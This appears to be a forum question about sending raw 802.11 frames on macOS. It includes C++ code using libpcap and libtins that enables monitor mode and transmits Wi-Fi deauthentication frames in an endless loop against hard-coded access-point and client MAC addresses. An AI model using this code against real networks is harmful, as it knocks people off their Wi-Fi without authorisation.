# How to send 802.11 packet on Mac OS?

Tags: macos, monitor, wifi

I want to send 802.11 packet on Mac OS.

I switch my NIC(en0) to monitor mode by libpcap using `pcap_set_rfmon`

I want to send deauth packet here's my code(Also I use libtins)

I think the matter is not my code.

```
int main(int argc, const char * argv[]) {

    if(!chk_arg(argc))
        exit(1);

    char const * interface=argv[1];

    //Set sniffer device
    SnifferConfiguration config;
    config.set_promisc_mode(true);
    config.set_rfmon(true);

    Sniffer sniffer(interface,config);

    cout<<"Device : "<<interface<<endl;


    DeauthSender deauth_sender(interface);

    deauth_sender.SendDeauthTo("90:9f:33:77:07:ce","68:db:ca:d9:50:67",126000);
```

here's DeathSender class definition

```
bool DeauthSender::SendDeauthTo(Dot11::address_type bssid, Dot11::address_type station,int send_count)
{

    //if not define bssid or station address
    if(bssid=="00:00:00:00:00:00"||station=="00:00:00:00:00:00")
    {
        cout<<"sendDeauthTo faild"<<endl;
        cout<<"BSSID : "<<bssid<<endl;
        cout<<"Station : "<<station<<endl;

        return false;
    }

    Dot11Deauthentication deauth(station,bssid);
    deauth.addr1(station);
    deauth.addr2(station);
    deauth.addr3(bssid); //Also BSSID must be set
    RadioTap radio = RadioTap() / deauth ; //Make Packet

    for (int i = 0; ; ++i) {

        sender_.send(radio,sniff_dev_);

    }

    return true;

}
```

It that impossible to send 802.11 packet on macOS?

Mac OS : High Sierra(newest)

Xcode Version : Newest